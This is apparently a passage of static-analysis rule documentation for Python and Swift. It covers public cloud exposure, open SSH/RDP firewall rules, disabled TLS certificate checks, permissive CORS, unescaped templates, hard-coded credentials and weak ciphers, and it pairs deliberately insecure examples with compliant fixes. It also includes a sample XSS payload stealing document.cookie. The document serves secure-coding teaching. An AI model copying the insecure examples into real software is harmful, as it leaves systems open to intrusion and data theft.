
ip = config.get(section, ipAddress)
sock = socket.socket()
sock.bind((ip, 9090))

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

python:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

For aws_cdk.aws_ec2.Instance and similar constructs:

from aws_cdk import aws_ec2 as ec2

ec2.Instance(
    self,
    "vpc_subnet_public",
    instance_type=nano_t2,
    machine_image=ec2.MachineImage.latest_amazon_linux(),
    vpc=vpc,
    vpc_subnets=ec2.SubnetSelection(subnet_type=ec2.SubnetType.PUBLIC) # Sensitive
)

For aws_cdk.aws_ec2.CfnInstance:

from aws_cdk import aws_ec2 as ec2

ec2.CfnInstance(
    self,
    "cfn_public_exposed",
    instance_type="t2.micro",
    image_id="ami-0ea0f26a6d50850c5",
    network_interfaces=[
        ec2.CfnInstance.NetworkInterfaceProperty(
            device_index="0",
            associate_public_ip_address=True, # Sensitive
            delete_on_termination=True,
            subnet_id=vpc.select_subnets(subnet_type=ec2.SubnetType.PUBLIC).subnet_ids[0]
        )
    ]
)

For aws_cdk.aws_dms.CfnReplicationInstance:

from aws_cdk import aws_dms as dms

rep_instance = dms.CfnReplicationInstance(
    self,
    "explicit_public",
    replication_instance_class="dms.t2.micro",
    allocated_storage=5,
    publicly_accessible=True, # Sensitive
    replication_subnet_group_identifier=subnet_group.replication_subnet_group_identifier,
    vpc_security_group_ids=[vpc.vpc_default_security_group]
)

For aws_cdk.aws_rds.CfnDBInstance:

from aws_cdk import aws_rds as rds
from aws_cdk import aws_ec2 as ec2

rds_subnet_group_public = rds.CfnDBSubnetGroup(
    self,
    "public_subnet",
    db_subnet_group_description="Subnets",
    subnet_ids=vpc.select_subnets(
        subnet_type=ec2.SubnetType.PUBLIC
    ).subnet_ids
)

rds.CfnDBInstance(
    self,
    "public-public-subnet",
    engine="postgres",
    master_username="foobar",
    master_user_password="12345678",
    db_instance_class="db.r5.large",
    allocated_storage="200",
    iops=1000,
    db_subnet_group_name=rds_subnet_group_public.ref,
    publicly_accessible=True, # Sensitive
    vpc_security_groups=[sg.security_group_id]
)

Compliant Solution

For aws_cdk.aws_ec2.Instance:

from aws_cdk import aws_ec2 as ec2

ec2.Instance(
    self,
    "vpc_subnet_private",
    instance_type=nano_t2,
    machine_image=ec2.MachineImage.latest_amazon_linux(),
    vpc=vpc,
    vpc_subnets=ec2.SubnetSelection(subnet_type=ec2.SubnetType.PRIVATE_WITH_NAT)
)

For aws_cdk.aws_ec2.CfnInstance:

from aws_cdk import aws_ec2 as ec2

ec2.CfnInstance(
    self,
    "cfn_private",
    instance_type="t2.micro",
    image_id="ami-0ea0f26a6d50850c5",
    network_interfaces=[
        ec2.CfnInstance.NetworkInterfaceProperty(
            device_index="0",
            associate_public_ip_address=False, # Compliant
            delete_on_termination=True,
            subnet_id=vpc.select_subnets(subnet_type=ec2.SubnetType.PRIVATE_WITH_NAT).subnet_ids[0]
        )
    ]
)

For aws_cdk.aws_dms.CfnReplicationInstance:

from aws_cdk import aws_dms as dms

rep_instance = dms.CfnReplicationInstance(
    self,
    "explicit_private",
    replication_instance_class="dms.t2.micro",
    allocated_storage=5,
    publicly_accessible=False,
    replication_subnet_group_identifier=subnet_group.replication_subnet_group_identifier,
    vpc_security_group_ids=[vpc.vpc_default_security_group]
)

For aws_cdk.aws_rds.CfnDBInstance:

from aws_cdk import aws_rds as rds
from aws_cdk import aws_ec2 as ec2

rds_subnet_group_private = rds.CfnDBSubnetGroup(
    self,
    "private_subnet",
    db_subnet_group_description="Subnets",
    subnet_ids=vpc.select_subnets(
        subnet_type=ec2.SubnetType.PRIVATE_WITH_NAT
    ).subnet_ids
)

rds.CfnDBInstance(
    self,
    "private-private-subnet",
    engine="postgres",
    master_username="foobar",
    master_user_password="12345678",
    db_instance_class="db.r5.large",
    allocated_storage="200",
    iops=1000,
    db_subnet_group_name=rds_subnet_group_private.ref,
    publicly_accessible=False,
    vpc_security_groups=[sg.security_group_id]
)

See

python:S4828

Signaling processes or process groups can seriously affect the stability of this application or other applications on the same system.

Accidentally setting an incorrect PID or signal or allowing untrusted sources to assign arbitrary values to these parameters may result in a denial of service.

Also, the system treats the signal differently if the destination PID is less than or equal to 0. This different behavior may affect multiple processes with the same (E)UID simultaneously if the call is left uncontrolled.

Ask Yourself Whether

  • The parameters pid and sig are untrusted (they come from an external source).
  • This function is triggered by non-administrators.
  • Signal handlers on the target processes stop important functions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For stateful applications with user management, ensure that only administrators trigger this code.
  • Verify that the pid and sig parameters are correct before using them.
  • Ensure that the process sending the signals runs with as few OS privileges as possible.
  • Isolate the process on the system based on its (E)UID.
  • Ensure that the signal does not interrupt any essential functions when intercepted by a target’s signal handlers.

Sensitive Code Example

import os

@app.route("/kill-pid/<pid>")
def send_signal(pid):
    os.kill(pid, 9)  # Sensitive

@app.route("/kill-pgid/<pgid>")
def send_signal(pgid):
    os.killpg(pgid, 9)  # Sensitive

Compliant Solution

import os

@app.route("/kill-pid/<pid>")
def send_signal(pid):
    # Validate the untrusted PID,
    # With a pre-approved list or authorization checks
    if is_valid_pid(pid):
        os.kill(pid, 9)

@app.route("/kill-pgid/<pgid>")
def send_signal(pgid):
    # Validate the untrusted PGID,
    # With a pre-approved list or authorization checks
    if is_valid_pgid(pgid):
        os.kill(pgid, 9)

See

python:S4829

This rule is deprecated, and will eventually be removed.

Reading Standard Input is security-sensitive. It has led in the past to the following vulnerabilities:

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.

Sensitive Code Example

Python 2 and Python 3

import sys
from sys import stdin, __stdin__

# Any reference to sys.stdin or sys.__stdin__ without a method call is Sensitive
sys.stdin  # Sensitive

for line in sys.stdin:  # Sensitive
    print(line)

it = iter(sys.stdin)  # Sensitive
line = next(it)

# Calling the following methods on stdin or __stdin__ is sensitive
sys.stdin.read()  # Sensitive
sys.stdin.readline()  # Sensitive
sys.stdin.readlines()  # Sensitive

# Calling other methods on stdin or __stdin__ does not require a review, thus it is not Sensitive
sys.stdin.seekable()  # Ok
# ...

Python 2 only

raw_input('What is your password?')  # Sensitive

Python 3 only

input('What is your password?')  # Sensitive

Function fileinput.input and class fileinput.FileInput read the standard input when the list of files is empty.

for line in fileinput.input():  # Sensitive
    print(line)

for line in fileinput.FileInput():  # Sensitive
    print(line)

for line in fileinput.input(['setup.py']):  # Ok
    print(line)

for line in fileinput.FileInput(['setup.py']):  # Ok
    print(line)

See

python:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led in the past to the following vulnerabilities:

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus passing sensitive information via command line arguments should be considered as insecure.

This rule raises an issue on every reference to sys.argv, call to optparse.OptionParser() or a call to argparse.ArgumentParser(). The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing them in the command line. It is common to write them on the process' standard input, or give the path to a file containing the information.

See

python:S6321

Why is this an issue?

Cloud platforms such as AWS, Azure, or GCP support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

For aws_cdk.aws_ec2.Instance and other constructs that support a connections attribute:

from aws_cdk import aws_ec2 as ec2

instance = ec2.Instance(
    self,
    "my_instance",
    instance_type=nano_t2,
    machine_image=ec2.MachineImage.latest_amazon_linux(),
    vpc=vpc
)

instance.connections.allow_from(
    ec2.Peer.any_ipv4(), # Noncompliant
    ec2.Port.tcp(22),
    description="Allows SSH from all IPv4"
)
instance.connections.allow_from_any_ipv4( # Noncompliant
    ec2.Port.tcp(3389),
    description="Allows Terminal Server from all IPv4"
)

For aws_cdk.aws_ec2.SecurityGroup

from aws_cdk import aws_ec2 as ec2
security_group = ec2.SecurityGroup(
    self,
    "custom-security-group",
    vpc=vpc
)

security_group.add_ingress_rule(
    ec2.Peer.any_ipv4(), # Noncompliant
    ec2.Port.tcp_range(1, 1024)
)

For aws_cdk.aws_ec2.CfnSecurityGroup

from aws_cdk import aws_ec2 as ec2

ec2.CfnSecurityGroup(
    self,
    "cfn-based-security-group",
    group_description="cfn based security group",
    group_name="cfn-based-security-group",
    vpc_id=vpc.vpc_id,
    security_group_ingress=[
        ec2.CfnSecurityGroup.IngressProperty( # Noncompliant
            ip_protocol="6",
            cidr_ip="0.0.0.0/0",
            from_port=22,
            to_port=22
        ),
        ec2.CfnSecurityGroup.IngressProperty( # Noncompliant
            ip_protocol="tcp",
            cidr_ip="0.0.0.0/0",
            from_port=3389,
            to_port=3389
        ),
        { # Noncompliant
            "ipProtocol":"-1",
            "cidrIpv6":"::/0"
        }
    ]
)

For aws_cdk.aws_ec2.CfnSecurityGroupIngress

from aws_cdk import aws_ec2 as ec2

ec2.CfnSecurityGroupIngress( # Noncompliant
    self,
    "ingress-all-ip-tcp-ssh",
    ip_protocol="tcp",
    cidr_ip="0.0.0.0/0",
    from_port=22,
    to_port=22,
    group_id=security_group.attr_group_id
)

ec2.CfnSecurityGroupIngress( # Noncompliant
    self,
    "ingress-all-ipv6-all-tcp",
    ip_protocol="-1",
    cidr_ipv6="::/0",
    group_id=security_group.attr_group_id
)

Compliant solution

For aws_cdk.aws_ec2.Instance and other constructs that support a connections attribute:

from aws_cdk import aws_ec2 as ec2

instance = ec2.Instance(
    self,
    "my_instance",
    instance_type=nano_t2,
    machine_image=ec2.MachineImage.latest_amazon_linux(),
    vpc=vpc
)

instance.connections.allow_from_any_ipv4(
    ec2.Port.tcp(1234),
    description="Allows 1234 from all IPv4"
)

instance.connections.allow_from(
    ec2.Peer.ipv4("192.0.2.0/24"),
    ec2.Port.tcp(22),
    description="Allows SSH from all IPv4"
)

For aws_cdk.aws_ec2.SecurityGroup

from aws_cdk import aws_ec2 as ec2
security_group = ec2.SecurityGroup(
    self,
    "custom-security-group",
    vpc=vpc
)

security_group.add_ingress_rule(
    ec2.Peer.any_ipv4(),
    ec2.Port.tcp_range(1024, 1048)
)

For aws_cdk.aws_ec2.CfnSecurityGroup

from aws_cdk import aws_ec2 as ec2

ec2.CfnSecurityGroup(
    self,
    "cfn-based-security-group",
    group_description="cfn based security group",
    group_name="cfn-based-security-group",
    vpc_id=vpc.vpc_id,
    security_group_ingress=[
        ec2.CfnSecurityGroup.IngressProperty(
            ip_protocol="tcp",
            cidr_ip="0.0.0.0/0",
            from_port=1024,
            to_port=1048
        ),
        {
            "ipProtocol":"6",
            "cidrIp":"192.0.2.0/24",
            "fromPort":22,
            "toPort":22
        }
    ]
)

For aws_cdk.aws_ec2.CfnSecurityGroupIngress

from aws_cdk import aws_ec2 as ec2

ec2.CfnSecurityGroupIngress(
    self,
    "ingress-all-ipv4-tcp-http",
    ip_protocol="6",
    cidr_ip="0.0.0.0/0",
    from_port=80,
    to_port=80,
    group_id=security_group.attr_group_id
)

ec2.CfnSecurityGroupIngress(
    self,
    "ingress-range-tcp-rdp",
    ip_protocol="tcp",
    cidr_ip="192.0.2.0/24",
    from_port=3389,
    to_port=3389,
    group_id=security_group.attr_group_id
)

Resources

Documentation

Standards

python:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Python Standard Library

Code examples

The following code contains examples of disabled certificate validation.

Certificate validation is not enabled by default when _create_unverified_context is used. It is recommended to use _create_default_https_context instead to create a secure context that validates certificates.

Noncompliant code example

import ssl

ctx1 = ssl._create_unverified_context() # Noncompliant
ctx2 = ssl._create_stdlib_context() # Noncompliant

ctx3 = ssl.create_default_context()
ctx3.verify_mode = ssl.CERT_NONE # Noncompliant

Compliant solution

import ssl

ctx = ssl.create_default_context()
ctx.verify_mode = ssl.CERT_REQUIRED

# By default, certificate validation is enabled
ctx = ssl._create_default_https_context()

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Standards

python:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is used, attackers have the opportunity to attempt attacks against the underlying API.
This means attacks both on the functionality provided by the API and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independant OIDC provider, glued to the infrastructure with a Lambda authorizer.

Sensitive Code Example

For aws_cdk.aws_apigateway.Resource:

from aws_cdk import (
    aws_apigateway as apigateway
)

resource = api.root.add_resource("example")
resource.add_method(
    "GET",
    authorization_type=apigateway.AuthorizationType.NONE  # Sensitive
)

For aws_cdk.aws_apigatewayv2.CfnRoute:

from aws_cdk import (
    aws_apigatewayv2 as apigateway
)

apigateway.CfnRoute(
    self,
    "no-auth",
    api_id=api.ref,
    route_key="GET /test",
    authorization_type="NONE"  # Sensitive
)

Compliant Solution

For aws_cdk.aws_apigateway.Resource:

from aws_cdk import (
    aws_apigateway as apigateway
)

opts = apigateway.MethodOptions(
    authorization_type=apigateway.AuthorizationType.IAM
)
resource = api.root.add_resource(
    "example",
    default_method_options=opts
)
resource.add_method(
    "POST",
    authorization_type=apigateway.AuthorizationType.IAM
)
resource.add_method(  # authorization_type is inherited from the Resource's configured default_method_options
    "POST"
)

For aws_cdk.aws_apigatewayv2.CfnRoute:

from aws_cdk import (
    aws_apigatewayv2 as apigateway
)

apigateway.CfnRoute(
    self,
    "auth",
    api_id=api.ref,
    route_key="GET /test",
    authorization_type="AWS_IAM"
)

See

python:S5247

To reduce the risk of cross-site scripting attacks, templating systems, such as Twig, Django, Smarty, Groovy's template engine, allow configuration of automatic variable escaping before rendering templates. When escape occurs, characters that make sense to the browser (eg: <a>) will be transformed/replaced with escaped/sanitized values (eg: & lt;a& gt; ).

Auto-escaping is not a magic feature to annihilate all cross-site scripting attacks, it depends on the strategy applied and the context, for example a "html auto-escaping" strategy (which only transforms html characters into html entities) will not be relevant when variables are used in a html attribute because ':' character is not escaped and thus an attack as below is possible:

<a href="{{ myLink }}">link</a> // myLink = javascript:alert(document.cookie)
<a href="javascript:alert(document.cookie)">link</a> // JS injection (XSS attack)

Ask Yourself Whether

  • Templates are used to render web content and
    • dynamic variables in templates come from untrusted locations or are user-controlled inputs
    • there is no local mechanism in place to sanitize or validate the inputs.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable auto-escaping by default and continue to review the use of inputs in order to be sure that the chosen auto-escaping strategy is the right one.

Sensitive Code Example

from jinja2 import Environment

env = Environment() # Sensitive: New Jinja2 Environment has autoescape set to false
env = Environment(autoescape=False) # Sensitive:

Compliant Solution

from jinja2 import Environment
env = Environment(autoescape=True) # Compliant

See

python:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can store messages encrypted as soon as they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message from the file system, for example through a vulnerability in the service, they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sqs.Queue:

from aws_cdk import (
    aws_sqs as sqs
)

class QueueStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sqs.Queue( # Sensitive, unencrypted by default
            self,
            "example"
        )

For aws_cdk.aws_sqs.CfnQueue:

from aws_cdk import (
    aws_sqs as sqs
)

class CfnQueueStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sqs.CfnQueue( # Sensitive, unencrypted by default
            self,
            "example"
        )

Compliant Solution

For aws_cdk.aws_sqs.Queue:

from aws_cdk import (
    aws_sqs as sqs
)

class QueueStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sqs.Queue(
            self,
            "example",
            encryption=sqs.QueueEncryption.KMS_MANAGED
        )

For aws_cdk.aws_sqs.CfnQueue:

from aws_cdk import (
    aws_sqs as sqs
)

class CfnQueueStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        my_key = kms.Key(self, "key")
        sqs.CfnQueue(
            self,
            "example",
            kms_master_key_id=my_key.key_id
        )

See

python:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_efs.FileSystem and aws_cdk.aws_efs.CfnFileSystem:

from aws_cdk import (
    aws_efs as efs
)

efs.FileSystem(
    self,
    "example",
    encrypted=False  # Sensitive
)

Compliant Solution

For aws_cdk.aws_efs.FileSystem and aws_cdk.aws_efs.CfnFileSystem:

from aws_cdk import (
    aws_efs as efs
)

efs.FileSystem(
    self,
    "example",
    encrypted=True
)

See

python:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

Same origin policy in browsers prevents, by default and for security-reasons, a javascript frontend to perform a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in response, called CORS, that act like directives for the browser and change the access control policy / relax the same origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

Django:

CORS_ORIGIN_ALLOW_ALL = True # Sensitive

Flask:

from flask import Flask
from flask_cors import CORS

app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*", "send_wildcard": "True"}}) # Sensitive

User-controlled origin:

origin = request.headers['ORIGIN']
resp = Response()
resp.headers['Access-Control-Allow-Origin'] = origin # Sensitive

Compliant Solution

Django:

CORS_ORIGIN_ALLOW_ALL = False # Compliant

Flask:

from flask import Flask
from flask_cors import CORS

app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*", "send_wildcard": "False"}}) # Compliant

User-controlled origin validated with an allow-list:

origin = request.headers['ORIGIN']
resp = Response()
if origin in TRUSTED_ORIGINS:
   resp.headers['Access-Control-Allow-Origin'] = origin

See

python:S2092

When a cookie is protected with the secure attribute set to true it will not be send by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is for instance a session-cookie not designed to be sent over non-HTTPS communication.
  • it’s not sure that the website contains mixed content or not (ie HTTPS everywhere or not)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPs everywhere so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

Flask

from flask import Response

@app.route('/')
def index():
    response = Response()
    response.set_cookie('key', 'value') # Sensitive
    return response

Compliant Solution

Flask

from flask import Response

@app.route('/')
def index():
    response = Response()
    response.set_cookie('key', 'value', secure=True) # Compliant
    return response

See

swift:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

let postData = "username=Steve&password=123456".data(using: .utf8)  // Sensitive
//...
var request = URLRequest(url: url)
request.HTTPBody = postData

Compliant Solution

let postData = "username=\(getEncryptedUser())&password=\(getEncryptedPass())".data(using: .utf8)
//...
var request = URLRequest(url: url)
request.HTTPBody = postData

See

swift:S2070

This rule is deprecated; use S4790 instead.

Why is this an issue?

The MD5 algorithm and its successor, SHA-1, are no longer considered secure, because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using the new, same-hash value gives an attacker the same access as if he had the originally-hashed value. This applies as well to the other Message-Digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160.

Consider using safer alternatives, such as SHA-256, SHA-512 or SHA-3.

Noncompliant code example

import CryptoSwift

let bytes:Array<UInt8> = [0x01, 0x02, 0x03]
let digest = input.md5() // Noncompliant

Compliant solution

import CryptoSwift

let bytes:Array<UInt8> = [0x01, 0x02, 0x03]
let digest = input.sha256() // Compliant

Resources

swift:S2278

This rule is deprecated; use S5547 instead.

Why is this an issue?

According to the US National Institute of Standards and Technology (NIST), the Data Encryption Standard (DES) is no longer considered secure:

Adopted in 1977 for federal agencies to use in protecting sensitive, unclassified information, the DES is being withdrawn because it no longer provides the security that is needed to protect federal government information.

Federal agencies are encouraged to use the Advanced Encryption Standard, a faster and stronger algorithm approved as FIPS 197 in 2001.

For similar reasons, RC2 should also be avoided.

Noncompliant code example

let cryptor = try Cryptor(operation: .encrypt, algorithm: .des, options: .none, key: key, iv: []) // Noncompliant

let crypt = CkoCrypt2()
crypt.CryptAlgorithm = "3des" // Noncompliant

Compliant solution

let cryptor = try Cryptor(operation: .encrypt, algorithm: .aes, options: .none, key: key, iv: []) // Compliant

let crypt = CkoCrypt2()
crypt.CryptAlgorithm = "aes" // Compliant

Resources

swift:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in CommonCrypto

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

import CommonCrypto

let algorithm = CCAlgorithm(kCCAlgorithmDES) // Noncompliant

Compliant solution

import Crypto

let sealedBox = try AES.GCM.seal(input, using: key)

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

swift:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

let host = Host(address: "192.168.12.42")

Compliant Solution

let host = Host(address: configuration.ipAddress)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

